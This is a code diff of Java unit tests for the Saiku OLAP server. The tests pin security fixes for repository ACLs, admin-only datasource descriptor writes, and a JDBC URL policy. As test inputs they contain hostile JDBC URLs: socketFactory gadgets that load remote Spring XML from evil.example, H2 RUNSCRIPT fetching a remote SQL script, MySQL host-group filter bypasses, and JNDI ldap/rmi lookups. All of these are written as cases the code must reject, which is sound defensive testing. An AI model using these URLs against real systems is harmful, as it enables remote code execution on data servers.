+     * reading a static field of {@code NotADriver} itself would trigger the very initialisation
+     * the assertion is checking for.
+     */
+    static final AtomicBoolean NOT_A_DRIVER_INITIALISED = new AtomicBoolean();
+
+    /** Not a {@link java.sql.Driver}; flips the outer flag if its static initialiser ever runs. */
+    public static final class NotADriver {
+        static {
+            NOT_A_DRIVER_INITIALISED.set(true);
+        }
+    }
+}

--- a/saiku-core/saiku-service/src/test/java/org/saiku/datasources/connection/SaikuConnectionPolicyChokepointTest.java
+++ b/saiku-core/saiku-service/src/test/java/org/saiku/datasources/connection/SaikuConnectionPolicyChokepointTest.java
@@ -70,6 +70,13 @@ public class SaikuConnectionPolicyChokepointTest {
     }
 
     @Test
+    public void olapConnection_refusesMysqlHostListSocketFactoryGadget_beforeAnyDriverIsAsked() throws Exception {
+        // SEC-confirmed bypass: the denied key rides inside the Connector/J host-property group.
+        assertRefusedBeforeDriver(new SaikuOlapConnection(
+                "evil", olapProps(mondrian("jdbc:mysql://(host=evil.example,socketFactory=com.evil.Factory)/db"))));
+    }
+
+    @Test
     public void olapConnection_refusesH2Init_beforeAnyDriverIsAsked() throws Exception {
         assertRefusedBeforeDriver(new SaikuOlapConnection(
                 "evil", olapProps(mondrian("jdbc:h2:mem:x;INIT=RUNSCRIPT FROM 'http://evil.example/p.sql'"))));

--- a/saiku-core/saiku-service/src/test/java/org/saiku/repository/Acl2DefaultMethodTest.java
+++ b/saiku-core/saiku-service/src/test/java/org/saiku/repository/Acl2DefaultMethodTest.java
@@ -1,0 +1,122 @@
+/*
+ *   Copyright 2026 Spicule Ltd
+ *   Apache License, Version 2.0.
+ */
+package org.saiku.repository;
+
+import static org.junit.Assert.assertFalse;
+import static org.junit.Assert.assertTrue;
+
+import java.io.File;
+import java.util.Arrays;
+import java.util.Collections;
+import java.util.HashMap;
+import java.util.List;
+import java.util.Map;
+import org.junit.Before;
+import org.junit.Rule;
+import org.junit.Test;
+import org.junit.rules.TemporaryFolder;
+
+/**
+ * saiku#1904 — the {@code switch} on {@link AclType} in {@link Acl2#getMethods} used to fall
+ * through to {@link AclMethod#WRITE} for PUBLIC (and any un-cased type), which made every PUBLIC
+ * node — the seeded {@code /datasources} and {@code /legacyreports} included — writable by every
+ * authenticated user. PUBLIC now means readable; WRITE needs an explicit grant, ownership, or an
+ * admin role. PRIVATE and SECURED semantics are pinned unchanged alongside.
+ */
+public class Acl2DefaultMethodTest {
+
+    private static final List<String> USER = Collections.singletonList("ROLE_USER");
+    private static final List<String> ADMIN = Arrays.asList("ROLE_USER", "ROLE_ADMIN");
+
+    @Rule
+    public TemporaryFolder tmp = new TemporaryFolder();
+
+    private File folder;
+
+    @Before
+    public void setUp() throws Exception {
+        folder = tmp.newFolder("shared");
+    }
+
+    @Test
+    public void publicNode_isReadableButNotWritable_forNonAdmin() {
+        Acl2 acl = seeded(AclType.PUBLIC, "admin", null);
+        List<AclMethod> methods = acl.getMethods(folder, "bob", USER);
+        assertTrue("PUBLIC must grant READ", methods.contains(AclMethod.READ));
+        assertFalse("PUBLIC must NOT grant WRITE (saiku#1904)", methods.contains(AclMethod.WRITE));
+        assertFalse("PUBLIC must NOT grant GRANT", methods.contains(AclMethod.GRANT));
+        assertTrue(acl.canRead(folder, "bob", USER));
+        assertFalse(acl.canWrite(folder, "bob", USER));
+    }
+
+    @Test
+    public void publicNode_adminStillGetsEverything() {
+        Acl2 acl = seeded(AclType.PUBLIC, "admin", null);
+        assertTrue(acl.canWrite(folder, "root", ADMIN));
+        assertTrue(acl.canGrant(folder, "root", ADMIN));
+    }
+
+    @Test
+    public void defaultConstructedEntry_isPublic_andResolvesToRead() {
+        // AclEntry() defaults to PUBLIC — the shape an acl.json with no explicit type produces.
+        Acl2 writer = new Acl2(folder);
+        writer.addEntry(folder.getPath(), new AclEntry());
+        writer.serialize(folder);
+        Acl2 acl = new Acl2(folder);
+        acl.setAdminRoles(Collections.singletonList("ROLE_ADMIN"));
+        assertTrue(acl.canRead(folder, "bob", USER));
+        assertFalse(acl.canWrite(folder, "bob", USER));
+    }
+
+    @Test
+    public void privateNode_ownerGetsGrant_othersGetNothing() {
+        Acl2 acl = seeded(AclType.PRIVATE, "alice", null);
+        assertTrue(acl.canWrite(folder, "alice", USER));
+        assertTrue(acl.canGrant(folder, "alice", USER));
+        assertFalse(acl.canRead(folder, "bob", USER));
+        assertFalse(acl.canWrite(folder, "bob", USER));
+        assertTrue("admin override intact", acl.canWrite(folder, "root", ADMIN));
+    }
+
+    @Test
+    public void securedNode_explicitRoleWriteGrant_isHonoured() {
+        Map<String, List<AclMethod>> roles = new HashMap<>();
+        roles.put("ROLE_USER", Arrays.asList(AclMethod.WRITE, AclMethod.READ));
+        Acl2 acl = seeded(AclType.SECURED, "admin", roles);
+        assertTrue(acl.canWrite(folder, "bob", USER));
+        assertFalse(acl.canGrant(folder, "bob", USER));
+    }
+
+    @Test
+    public void securedNode_withoutGrant_denies() {
+        Map<String, List<AclMethod>> roles = new HashMap<>();
+        roles.put("ROLE_ADMIN", Arrays.asList(AclMethod.WRITE, AclMethod.READ, AclMethod.GRANT));
+        Acl2 acl = seeded(AclType.SECURED, "admin", roles);
+        assertFalse(acl.canRead(folder, "bob", USER));
+        assertFalse(acl.canWrite(folder, "bob", USER));
+        assertTrue(acl.canWrite(folder, "root", ADMIN));
+    }
+
+    @Test
+    public void childOfPublicFolder_inheritsReadNotWrite() throws Exception {
+        seeded(AclType.PUBLIC, "admin", null);
+        File child = new File(folder, "report.saiku");
+        assertTrue(child.createNewFile());
+        Acl2 acl = new Acl2(child);
+        acl.setAdminRoles(Collections.singletonList("ROLE_ADMIN"));
+        assertTrue(acl.canRead(child, "bob", USER));
+        assertFalse("inheritance must not widen to WRITE", acl.canWrite(child, "bob", USER));
+    }
+
+    /** Write an entry for {@link #folder} to its acl.json and return a fresh reader over it. */
+    private Acl2 seeded(AclType type, String owner, Map<String, List<AclMethod>> roles) {
+        Acl2 writer = new Acl2(folder);
+        writer.addEntry(folder.getPath(), new AclEntry(owner, type, roles, null));
+        writer.serialize(folder);
+        Acl2 reader = new Acl2(folder);
+        reader.setAdminRoles(Collections.singletonList("ROLE_ADMIN"));
+        return reader;
+    }
+}

--- a/saiku-core/saiku-service/src/test/java/org/saiku/repository/FilesystemRepositoryManagerAclTest.java
+++ b/saiku-core/saiku-service/src/test/java/org/saiku/repository/FilesystemRepositoryManagerAclTest.java
@@ -5,6 +5,7 @@
 package org.saiku.repository;
 
 import static org.junit.Assert.assertEquals;
+import static org.junit.Assert.assertFalse;
 import static org.junit.Assert.assertTrue;
 import static org.junit.Assert.fail;
 
@@ -22,6 +23,7 @@ import org.junit.Rule;
 import org.junit.Test;
 import org.junit.rules.TemporaryFolder;
 import org.saiku.service.user.UserService;
+import org.saiku.service.util.exception.SaikuServiceException;
 
 /**
  * Regression coverage for saiku#895 (saveFile missing canWrite check) and
@@ -87,6 +89,90 @@ public class FilesystemRepositoryManagerAclTest {
     @After
     public void tearDown() throws Exception {
         resetSingleton();
+    }
+
+    // ---- saiku#1903: datasource descriptors are admin-only, wherever they land ----
+
+    @Test
+    public void saveFile_nonAdmin_cannot_write_sds_into_their_own_home() throws Exception {
+        // bob owns his home (PRIVATE), so the plain ACL would allow the write — the
+        // descriptor guard must refuse it regardless, because the loader lists *.sds
+        // recursively and would connect its URL on the next refresh.
+        File bobHome = new File(datadir, "unknown/homes/bob");
+        assertTrue(bobHome.mkdirs());
+        writeAclJson(bobHome, bobHome.getPath(), "PRIVATE", "bob");
+        try {
+            manager.saveFile("<dataSource/>", "/homes/bob/evil.sds", "bob", "nt:saikufiles", ROLES_USER);
+            fail("non-admin .sds write must be refused");
+        } catch (SaikuServiceException expected) {
+            assertTrue(expected.getMessage(), expected.getMessage().contains("administrator"));
+        }
+        assertFalse("nothing may be written", new File(bobHome, "evil.sds").exists());
+        // Case must not matter: the guard is what stops a descriptor, not the listing's case rules.
+        try {
+            manager.saveFile("<dataSource/>", "/homes/bob/evil.SDS", "bob", "nt:saikufiles", ROLES_USER);
+            fail("non-admin .SDS write must be refused");
+        } catch (SaikuServiceException expected) {
+            // expected
+        }
+    }
+
+    @Test
+    public void saveFile_nonAdmin_cannot_write_anything_under_datasources() throws Exception {
+        try {
+            manager.saveFile("x", "/datasources/schema.xml", "bob", "nt:saikufiles", ROLES_USER);
+            fail("non-admin write under /datasources must be refused");
+        } catch (SaikuServiceException expected) {
+            assertTrue(expected.getMessage(), expected.getMessage().contains("administrator"));
+        }
+    }
+
+    @Test
+    public void saveFile_admin_can_still_write_sds() throws Exception {
+        manager.saveFile("<dataSource/>", "/homes/admin/tool.sds", "admin", "nt:saikufiles", ROLES_ADMIN);
+        assertEquals(
+                "<dataSource/>",
+                new String(Files.readAllBytes(new File(adminHomeDir, "tool.sds").toPath()), StandardCharsets.UTF_8));
+    }
+
+    @Test
+    public void saveFile_nonAdmin_can_still_write_ordinary_files_in_their_home() throws Exception {
+        File bobHome = new File(datadir, "unknown/homes/bob");
+        assertTrue(bobHome.mkdirs());
+        writeAclJson(bobHome, bobHome.getPath(), "PRIVATE", "bob");
+        manager.saveFile("{}", "/homes/bob/report.saiku", "bob", "nt:saikufiles", ROLES_USER);
+        assertTrue("ordinary saves are untouched by the descriptor guard", new File(bobHome, "report.saiku").exists());
+    }
+
+    @Test
+    public void moveFile_nonAdmin_cannot_rename_into_sds() throws Exception {
+        File bobHome = new File(datadir, "unknown/homes/bob");
+        assertTrue(bobHome.mkdirs());
+        writeAclJson(bobHome, bobHome.getPath(), "PRIVATE", "bob");
+        Files.write(new File(bobHome, "innocent.txt").toPath(), "<dataSource/>".getBytes(StandardCharsets.UTF_8));
+        try {
+            manager.moveFile("/homes/bob/innocent.txt", "/homes/bob/evil.sds", "bob", ROLES_USER);
+            fail("renaming a file into *.sds is a descriptor write and must be refused for non-admins");
+        } catch (SaikuServiceException expected) {
+            assertTrue(expected.getMessage(), expected.getMessage().contains("administrator"));
+        }
+        assertFalse(new File(bobHome, "evil.sds").exists());
+        assertTrue(new File(bobHome, "innocent.txt").exists());
+    }
+
+    @Test
+    public void isDatasourceDescriptorPath_recognisesTheShapesTheLoaderConsumes() {
+        assertTrue(FilesystemRepositoryManager.isDatasourceDescriptorPath("/homes/bob/x.sds"));
+        assertTrue(FilesystemRepositoryManager.isDatasourceDescriptorPath("x.SDS"));
+        assertTrue(FilesystemRepositoryManager.isDatasourceDescriptorPath("/datasources/schema.xml"));
+        assertTrue(FilesystemRepositoryManager.isDatasourceDescriptorPath("datasources/schema.xml"));
+        assertTrue(FilesystemRepositoryManager.isDatasourceDescriptorPath("./datasources/schema.xml"));
+        assertTrue(FilesystemRepositoryManager.isDatasourceDescriptorPath("\\datasources\\schema.xml"));
+        assertTrue(FilesystemRepositoryManager.isDatasourceDescriptorPath("/tenant/datasources/x.xml"));
+        assertFalse(FilesystemRepositoryManager.isDatasourceDescriptorPath("/homes/bob/report.saiku"));
+        assertFalse(FilesystemRepositoryManager.isDatasourceDescriptorPath("/homes/bob/my-datasources-notes.txt"));
+        assertFalse(FilesystemRepositoryManager.isDatasourceDescriptorPath("/homes/bob/x.sds.bak"));
+        assertFalse(FilesystemRepositoryManager.isDatasourceDescriptorPath(null));
     }
 
     // ---- saiku#895: saveFile authorization ----------------------------

--- a/saiku-core/saiku-service/src/test/java/org/saiku/repository/FilesystemRepositoryManagerAclTest.java
+++ b/saiku-core/saiku-service/src/test/java/org/saiku/repository/FilesystemRepositoryManagerAclTest.java
@@ -175,6 +175,32 @@ public class FilesystemRepositoryManagerAclTest {
         assertFalse(FilesystemRepositoryManager.isDatasourceDescriptorPath(null));
     }
 
+    @Test
+    public void isDatasourceDescriptorPath_seesThroughWindowsFilenameNormalisation() {
+        // saiku#1903 SEC follow-up: Win32 strips trailing dots/spaces and treats an NTFS ADS suffix
+        // as the base file, so these all land on disk as evil.sds and must be recognised.
+        assertTrue(FilesystemRepositoryManager.isDatasourceDescriptorPath("/homes/bob/evil.sds."));
+        assertTrue(FilesystemRepositoryManager.isDatasourceDescriptorPath("/homes/bob/evil.sds.. "));
+        assertTrue(FilesystemRepositoryManager.isDatasourceDescriptorPath("/homes/bob/evil.sds "));
+        assertTrue(FilesystemRepositoryManager.isDatasourceDescriptorPath("/homes/bob/EVIL.SDS."));
+        assertTrue(FilesystemRepositoryManager.isDatasourceDescriptorPath("/homes/bob/evil.sds::$DATA"));
+        assertTrue(FilesystemRepositoryManager.isDatasourceDescriptorPath("/homes/bob/evil.sds:$DATA"));
+        assertTrue(FilesystemRepositoryManager.isDatasourceDescriptorPath("/homes/bob/evil.sds:stream"));
+    }
+
+    @Test
+    public void saveFile_nonAdmin_cannot_write_sds_with_trailing_dot() throws Exception {
+        File bobHome = new File(datadir, "unknown/homes/bob");
+        assertTrue(bobHome.mkdirs());
+        writeAclJson(bobHome, bobHome.getPath(), "PRIVATE", "bob");
+        try {
+            manager.saveFile("<dataSource/>", "/homes/bob/evil.sds.", "bob", "nt:saikufiles", ROLES_USER);
+            fail("a trailing-dot .sds write must be refused (Win32 would drop the dot)");
+        } catch (SaikuServiceException expected) {
+            assertTrue(expected.getMessage(), expected.getMessage().contains("administrator"));
+        }
+    }
+
     // ---- saiku#895: saveFile authorization ----------------------------
 
     @Test

--- a/saiku-core/saiku-service/src/test/java/org/saiku/repository/FilesystemRepositoryManagerSeedTest.java
+++ b/saiku-core/saiku-service/src/test/java/org/saiku/repository/FilesystemRepositoryManagerSeedTest.java
@@ -64,9 +64,10 @@ public class FilesystemRepositoryManagerSeedTest {
     }
 
     @Test
-    public void datasources_seeded_with_PUBLIC_admin_grant() throws Exception {
+    public void datasources_seeded_with_SECURED_admin_grant() throws Exception {
+        // saiku#1904: was PUBLIC, which resolved to WRITE for every authenticated user.
         JsonNode entry = readEntry("datasources");
-        assertEquals("PUBLIC", entry.get("type").asText());
+        assertEquals("SECURED", entry.get("type").asText());
         JsonNode roles = entry.get("roles");
         assertTrue("ROLE_ADMIN grant must be present on /datasources/", roles.has("ROLE_ADMIN"));
     }
@@ -85,6 +86,37 @@ public class FilesystemRepositoryManagerSeedTest {
         assertEquals("SECURED", entry.get("type").asText());
         JsonNode roles = entry.get("roles");
         assertTrue("ROLE_ADMIN grant must be present on /queries/", roles.has("ROLE_ADMIN"));
+    }
+
+    /**
+     * saiku#1904: what the seeded ACL actually RESOLVES to for a non-admin — the
+     * property the RCE chain abused. /datasources is now closed to non-admins
+     * (no read: descriptors carry warehouse credentials; no write: that's how a
+     * descriptor got planted), and admins keep full control.
+     */
+    @Test
+    public void datasources_folder_is_closed_to_nonAdmins_and_open_to_admins() {
+        File datasources = new File(datadir, "unknown/datasources");
+        Acl2 acl = new Acl2(datasources);
+        acl.setAdminRoles(Collections.singletonList("ROLE_ADMIN"));
+        java.util.List<String> user = Collections.singletonList("ROLE_USER");
+        java.util.List<String> admin = java.util.Arrays.asList("ROLE_USER", "ROLE_ADMIN");
+        assertTrue("non-admin must not be able to write /datasources", !acl.canWrite(datasources, "bob", user));
+        assertTrue("non-admin must not be able to read /datasources", !acl.canRead(datasources, "bob", user));
+        assertTrue("admin must be able to write /datasources", acl.canWrite(datasources, "root", admin));
+        assertTrue("admin must be able to grant on /datasources", acl.canGrant(datasources, "root", admin));
+    }
+
+    @Test
+    public void legacyreports_stays_PUBLIC_but_PUBLIC_now_means_read_only() throws Exception {
+        JsonNode entry = readEntry("legacyreports");
+        assertEquals("PUBLIC", entry.get("type").asText());
+        File legacy = new File(datadir, "unknown/legacyreports");
+        Acl2 acl = new Acl2(legacy);
+        acl.setAdminRoles(Collections.singletonList("ROLE_ADMIN"));
+        java.util.List<String> user = Collections.singletonList("ROLE_USER");
+        assertTrue(acl.canRead(legacy, "bob", user));
+        assertTrue("PUBLIC must not resolve to WRITE any more (saiku#1904)", !acl.canWrite(legacy, "bob", user));
     }
 
     /**

--- a/saiku-core/saiku-service/src/test/java/org/saiku/service/datasource/DatasourceFileLoadPolicyTest.java
+++ b/saiku-core/saiku-service/src/test/java/org/saiku/service/datasource/DatasourceFileLoadPolicyTest.java
@@ -1,0 +1,191 @@
+/*
+ *   Copyright 2026 Spicule Ltd
+ *   Apache License, Version 2.0.
+ */
+package org.saiku.service.datasource;
+
+import static org.junit.Assert.assertEquals;
+import static org.junit.Assert.assertNotNull;
+import static org.junit.Assert.assertTrue;
+import static org.junit.Assert.fail;
+
+import java.io.File;
+import java.lang.reflect.Constructor;
+import java.lang.reflect.Field;
+import java.nio.charset.StandardCharsets;
+import java.nio.file.Files;
+import java.sql.DriverManager;
+import java.util.Collections;
+import org.junit.After;
+import org.junit.Before;
+import org.junit.Rule;
+import org.junit.Test;
+import org.junit.rules.TemporaryFolder;
+import org.saiku.datasources.connection.ISaikuConnection;
+import org.saiku.datasources.connection.RecordingJdbcDriver;
+import org.saiku.datasources.connection.SaikuConnectionFactory;
+import org.saiku.datasources.datasource.SaikuDatasource;
+import org.saiku.repository.DataSource;
+import org.saiku.repository.FilesystemRepositoryManager;
+import org.saiku.repository.ScopedRepo;
+import org.saiku.service.user.UserService;
+
+/**
+ * saiku#1902 / saiku#1903 — the <em>file-load</em> path end to end: an {@code .sds} descriptor on
+ * disk → {@link FilesystemRepositoryManager#getAllDataSources()} → {@link
+ * RepositoryDatasourceManager} property setup → {@link SaikuConnectionFactory}. Before the fix the
+ * only validation lived in the admin REST mapper, so a descriptor that reached the repository by
+ * any other route (a user's writable home, the world-writable {@code /datasources}) connected its
+ * URL verbatim on boot or refresh.
+ */
+public class DatasourceFileLoadPolicyTest {
+
+    private static final String TEST_SCHEME = "saikutest";
+
+    private static final String PG_GADGET = "jdbc:postgresql://evil.example:5432/db"
+            + "?socketFactory=org.springframework.context.support.ClassPathXmlApplicationContext"
+            + "&amp;socketFactoryArg=http://evil.example/ctx.xml";
+
+    @Rule
+    public TemporaryFolder tmp = new TemporaryFolder();
+
+    private File datadir;
+    private FilesystemRepositoryManager frm;
+    private RepositoryDatasourceManager rdm;
+    private RecordingJdbcDriver driver;
+
+    @Before
+    public void setUp() throws Exception {
+        resetSingleton();
+        datadir = tmp.newFolder("repo");
+        // Bootstrap markers so getDatadir()'s lazy seeding branch is skipped (same trick the ACL tests use).
+        mkdirs(new File(datadir, "unknown/etc"));
+        mkdirs(new File(datadir, "unknown/homes/bob"));
+        mkdirs(new File(datadir, "unknown/datasources"));
+
+        frm = newManager(datadir.getAbsolutePath());
+        UserService us = new UserService();
+        us.setAdminRoles(Collections.singletonList("ROLE_ADMIN"));
+        injectUserService(frm, us);
+
+        rdm = new RepositoryDatasourceManager();
+        rdm.setRepositoryManager(frm);
+        rdm.setType("classpath");
+        rdm.setWorkspaces("false");
+        rdm.setDatadir(datadir.getAbsolutePath());
+
+        driver = new RecordingJdbcDriver();
+        DriverManager.registerDriver(driver);
+        System.setProperty(JdbcUrlPolicy.ALLOWED_SCHEMES_PROPERTY, TEST_SCHEME);
+    }
+
+    @After
+    public void tearDown() throws Exception {
+        DriverManager.deregisterDriver(driver);
+        System.clearProperty(JdbcUrlPolicy.ALLOWED_SCHEMES_PROPERTY);
+        resetSingleton();
+    }
+
+    @Test
+    public void descriptorInAUserHome_isDiscoveredByTheLoader() throws Exception {
+        // Documents WHY the write-side block matters: the loader does not confine itself to
+        // /datasources — anything ending in .sds anywhere under the datadir is a datasource.
+        writeSds(
+                new File(datadir, "unknown/homes/bob/evil.sds"),
+                "evil",
+                "mondrian.olap4j.MondrianOlap4jDriver",
+                mondrian(PG_GADGET));
+        boolean found = false;
+        for (DataSource d : frm.getAllDataSources()) {
+            if ("evil".equals(d.getName())) {
+                found = true;
+            }
+        }
+        assertTrue("a *.sds in /homes/bob must be listed by getAllDataSources()", found);
+    }
+
+    @Test
+    public void gadgetDescriptorLoadedFromDisk_isNeverConnected() throws Exception {
+        writeSds(
+                new File(datadir, "unknown/homes/bob/evil.sds"),
+                "evil",
+                "mondrian.olap4j.MondrianOlap4jDriver",
+                mondrian(PG_GADGET));
+
+        SaikuDatasource ds = rdm.getDatasource("evil");
+        assertNotNull("the descriptor is loaded (validation is at connect time, not load time)", ds);
+        assertTrue(
+                "the loader hands the URL through verbatim",
+                ds.getProperties().getProperty(ISaikuConnection.URL_KEY).contains("socketFactory="));
+
+        try {
+            SaikuConnectionFactory.getConnection(ds);
+            fail("the file-loaded gadget URL must be refused at the chokepoint");
+        } catch (IllegalArgumentException expected) {
+            assertTrue(expected.getMessage(), expected.getMessage().contains("Invalid datasource JDBC URL"));
+        }
+        assertEquals("no driver may ever see the gadget URL", 0, driver.connectCalls.get());
+    }
+
+    @Test
+    public void benignDescriptorLoadedFromDisk_stillConnects() throws Exception {
+        writeSds(
+                new File(datadir, "unknown/datasources/good.sds"),
+                "good",
+                RecordingJdbcDriver.class.getName(),
+                "jdbc:" + TEST_SCHEME + ":ok");
+
+        SaikuDatasource ds = rdm.getDatasource("good");
+        assertNotNull(ds);
+        ISaikuConnection con = SaikuConnectionFactory.getConnection(ds);
+        assertNotNull("a permitted descriptor must still open through the same path", con);
+        assertTrue(con.initialized());
+        assertEquals(1, driver.connectCalls.get());
+    }
+
+    /* ---------------------------------------------------------------- helpers */
+
+    private static String mondrian(String inner) {
+        return "jdbc:mondrian:Jdbc=" + inner + ";Catalog=file:/tmp/x.xml;JdbcDrivers=org.postgresql.Driver";
+    }
+
+    private static void writeSds(File target, String name, String driverClass, String location) throws Exception {
+        String xml = "<?xml version=\"1.0\" encoding=\"UTF-8\" standalone=\"yes\"?>\n"
+                + "<dataSource>\n"
+                + "    <driver>" + driverClass + "</driver>\n"
+                + "    <id>" + name + "-id</id>\n"
+                + "    <location>" + location + "</location>\n"
+                + "    <name>" + name + "</name>\n"
+                + "    <password></password>\n"
+                + "    <securityenabled>false</securityenabled>\n"
+                + "    <type>OLAP</type>\n"
+                + "    <username>sa</username>\n"
+                + "</dataSource>\n";
+        Files.write(target.toPath(), xml.getBytes(StandardCharsets.UTF_8));
+    }
+
+    private static void mkdirs(File dir) {
+        if (!dir.exists() && !dir.mkdirs()) {
+            throw new IllegalStateException("Could not create " + dir);
+        }
+    }
+
+    private static FilesystemRepositoryManager newManager(String path) throws Exception {
+        Constructor<FilesystemRepositoryManager> ctor = FilesystemRepositoryManager.class.getDeclaredConstructor(
+                String.class, String.class, ScopedRepo.class, boolean.class);
+        ctor.setAccessible(true);
+        return ctor.newInstance(path, "ROLE_USER", new ScopedRepo(), false);
+    }
+
+    private static void injectUserService(FilesystemRepositoryManager mgr, UserService us) throws Exception {
+        Field f = FilesystemRepositoryManager.class.getDeclaredField("userService");
+        f.setAccessible(true);
+        f.set(mgr, us);
+    }
+
+    private static void resetSingleton() throws Exception {
+        Field ref = FilesystemRepositoryManager.class.getDeclaredField("ref");
+        ref.setAccessible(true);
+        ref.set(null, null);
+    }
+}

--- a/saiku-core/saiku-service/src/test/java/org/saiku/service/datasource/JdbcUrlPolicyTest.java
+++ b/saiku-core/saiku-service/src/test/java/org/saiku/service/datasource/JdbcUrlPolicyTest.java
@@ -165,6 +165,28 @@ public class JdbcUrlPolicyTest {
         assertRejected("jdbc:mysql://h/db?ha.loadBalanceStrategy=evil.Cls", "loadbalancestrategy");
         assertRejected("jdbc:mysql:loadbalance://h1,h2/db?loadBalanceStrategy=evil.Cls", "loadbalancestrategy");
         assertRejected("jdbc:mariadb://h/db?allowLocalInfile=true", "allowlocalinfile");
+        // SEC bypass: Connector/J host-list form — the denied key is NOT the first key in the
+        // token, and comma is a property separator here. Must still be caught.
+        assertRejected("jdbc:mysql://(host=localhost,port=3306,socketFactory=com.evil.Factory)/db", "socketfactory");
+    }
+
+    /**
+     * saiku#1902 (SEC-confirmed bypass): denied keys nested in MySQL/MariaDB host-property groups,
+     * the {@code address=(...)} form, and Teradata's comma-separated parameters must all be caught —
+     * the old first-{@code =}-per-token scan missed them and let a Connector/J socketFactory gadget
+     * (RCE) through.
+     */
+    @Test
+    public void rejectsDeniedKeysInHostGroupAndCommaForms() {
+        // MySQL/MariaDB (host=...,key=...) group.
+        assertRejected("jdbc:mysql://(host=h,port=3306,socketFactory=com.evil.Factory)/db", "socketfactory");
+        assertRejected("jdbc:mariadb://(host=h,autoDeserialize=true)/db", "autodeserialize");
+        // MySQL address=(...)(...) form — the denied key is in a second parenthesised group.
+        assertRejected("jdbc:mysql://address=(host=h)(socketFactory=com.evil.Factory)/db", "socketfactory");
+        // Teradata comma-separated params.
+        assertRejected("jdbc:teradata://h/DATABASE=x,LOGMECH=LDAP,socketFactory=com.evil.Factory", "socketfactory");
+        // Second occurrence after a benign first key in the same ?query token (comma-joined).
+        assertRejected("jdbc:postgresql://h/db?ApplicationName=ok,socketFactory=com.evil.Factory", "socketfactory");
     }
 
     @Test
@@ -224,6 +246,47 @@ public class JdbcUrlPolicyTest {
         assertRejected("jdbc:mondrian:DataSource=ldap://evil.example:1389/x;Catalog=file:/x.xml", "JNDI");
         assertRejected("jdbc:mondrian:DataSource=rmi://evil.example:1099/x;Catalog=file:/x.xml", "JNDI");
         assertRejected("jdbc:mondrian:DataSource='ldap://evil.example/x';Catalog=file:/x.xml", "JNDI");
+    }
+
+    @Test
+    public void rejectsMondrianClassInstantiationHooks() {
+        // saiku#1903 defence in depth: Mondrian would Class.forName+instantiate these.
+        assertRejected(
+                "jdbc:mondrian:Jdbc=jdbc:h2:mem:x;DynamicSchemaProcessor=com.evil.X;Catalog=file:/x.xml",
+                "DynamicSchemaProcessor");
+        assertRejected(
+                "jdbc:mondrian:Jdbc=jdbc:h2:mem:x;DataSourceChangeListener=com.evil.X;Catalog=file:/x.xml",
+                "DataSourceChangeListener");
+        // Case-insensitive, and inside the mondrian4 rewrite form too.
+        assertRejected(
+                "jdbc:mondrian4:Jdbc=jdbc:h2:mem:x;dynamicschemaprocessor=com.evil.X;Catalog=file:/x.xml",
+                "DynamicSchemaProcessor");
+    }
+
+    @Test
+    public void allowsMondrianJdbcDriversByDesign() {
+        // JdbcDrivers= names the JDBC driver class and is a required, legitimate part of a Mondrian
+        // connect string — it must NOT be blanket-denied (admin-authored, admin-only to write).
+        JdbcUrlPolicy.validate(
+                "jdbc:mondrian:Jdbc=jdbc:h2:mem:x;Catalog=file:/x.xml;JdbcDrivers=org.h2.Driver,com.mysql.cj.jdbc.Driver");
+    }
+
+    @Test
+    public void openConnectionInfoMap_rejectsDeniedKeys() throws Exception {
+        java.util.Properties benign = new java.util.Properties();
+        benign.setProperty("user", "sa");
+        benign.setProperty("password", "");
+        JdbcUrlPolicy.rejectDeniedInfoProperties(benign); // no throw
+
+        java.util.Properties gadget = new java.util.Properties();
+        gadget.setProperty("socketFactory", "com.evil.Factory");
+        try {
+            JdbcUrlPolicy.rejectDeniedInfoProperties(gadget);
+            fail("a denied key smuggled through the info map must be rejected");
+        } catch (IllegalArgumentException expected) {
+            assertTrue(
+                    expected.getMessage(), expected.getMessage().toLowerCase().contains("socketfactory"));
+        }
     }
 
     @Test

--- a/saiku-core/saiku-service/src/test/java/org/saiku/service/datasource/JdbcUrlPolicyTest.java
+++ b/saiku-core/saiku-service/src/test/java/org/saiku/service/datasource/JdbcUrlPolicyTest.java
@@ -1,0 +1,298 @@
+/*
+ *   Copyright 2026 Spicule Ltd
+ *   Apache License, Version 2.0.
+ */
+package org.saiku.service.datasource;
+
+import static org.junit.Assert.assertFalse;
+import static org.junit.Assert.assertTrue;
+import static org.junit.Assert.fail;
+
+import org.junit.After;
+import org.junit.Test;
+
+/**
+ * saiku#1902: the connection-time policy. Two halves — every legitimate datasource shape Saiku
+ * ships or documents must pass (no false positives), and every driver gadget family must be
+ * refused, including the obfuscated spellings a driver would still honour.
+ */
+public class JdbcUrlPolicyTest {
+
+    private static final String PG_GADGET = "jdbc:postgresql://evil.example:5432/db"
+            + "?socketFactory=org.springframework.context.support.ClassPathXmlApplicationContext"
+            + "&socketFactoryArg=http://evil.example/ctx.xml";
+
+    @After
+    public void clearOperatorProperty() {
+        System.clearProperty(JdbcUrlPolicy.ALLOWED_SCHEMES_PROPERTY);
+    }
+
+    /* ------------------------------------------------------------------ accepts */
+
+    @Test
+    public void acceptsFoodmartSeedLocation_windows() {
+        // The launcher's seeded datasource, exactly as SaikuOlapConnection hands it to the driver
+        // (JdbcUser appended, trailing ';', H2 MODE= param inside the inner URL, file: catalog).
+        JdbcUrlPolicy.validate("jdbc:mondrian:Jdbc=jdbc:h2:C:/Users/me/saiku-home/data/foodmart;MODE=MySQL;"
+                + "Catalog=file:C:/Users/me/saiku-home/data/FoodMart4.xml;JdbcDrivers=org.h2.Driver;JdbcUser=sa;");
+    }
+
+    @Test
+    public void acceptsFoodmartSeedLocation_unix() {
+        JdbcUrlPolicy.validate("jdbc:mondrian:Jdbc=jdbc:h2:/opt/saiku-home/data/foodmart;MODE=MySQL;"
+                + "Catalog=file:/opt/saiku-home/data/FoodMart4.xml;JdbcDrivers=org.h2.Driver");
+    }
+
+    @Test
+    public void acceptsOssieSeedWarehouses() {
+        JdbcUrlPolicy.validate("jdbc:h2:/opt/saiku-home/data/tpcds;MODE=PostgreSQL;AUTO_SERVER=TRUE");
+        JdbcUrlPolicy.validate("jdbc:h2:mem:flights;DB_CLOSE_DELAY=-1");
+        JdbcUrlPolicy.validate("jdbc:quack:/opt/saiku-home/data/warehouse.duckdb");
+    }
+
+    @Test
+    public void acceptsOrdinaryWarehouseUrls() {
+        JdbcUrlPolicy.validate("jdbc:postgresql://db.example.com:5432/warehouse"
+                + "?ssl=true&sslmode=verify-full&sslrootcert=/etc/ssl/ca.pem&currentSchema=sales");
+        JdbcUrlPolicy.validate("jdbc:mysql://db.example.com:3306/warehouse?useSSL=true&serverTimezone=UTC");
